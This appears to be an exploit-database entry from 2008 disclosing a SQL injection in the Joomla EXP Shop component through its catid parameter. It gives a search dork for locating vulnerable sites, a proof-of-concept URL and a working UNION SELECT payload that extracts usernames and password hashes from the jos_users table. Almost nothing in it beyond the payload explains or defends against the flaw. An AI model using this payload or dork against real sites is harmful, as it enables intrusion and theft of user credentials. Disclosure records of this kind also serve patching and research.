id: 3253
date: 06/21/2008
title: Joomla Component EXP Shop (catid) SQL Injection Vulnerability
author: His0k4
cves: 

=============================================================
Joomla Component EXP Shop (catid) SQL Injection Vulnerability
=============================================================




[*] Author    :  His0k4 [ALGERIAN HaCkEr]

[*] Dork      :  inurl:com_expshop

[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&catid={SQL}

[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&catid=-2 UNION SELECT @@version,@@version,concat(username,0x3a,password) FROM jos_users--

                
----------------------------------------------------------------------------




#  0day.today [2023-03-27]  #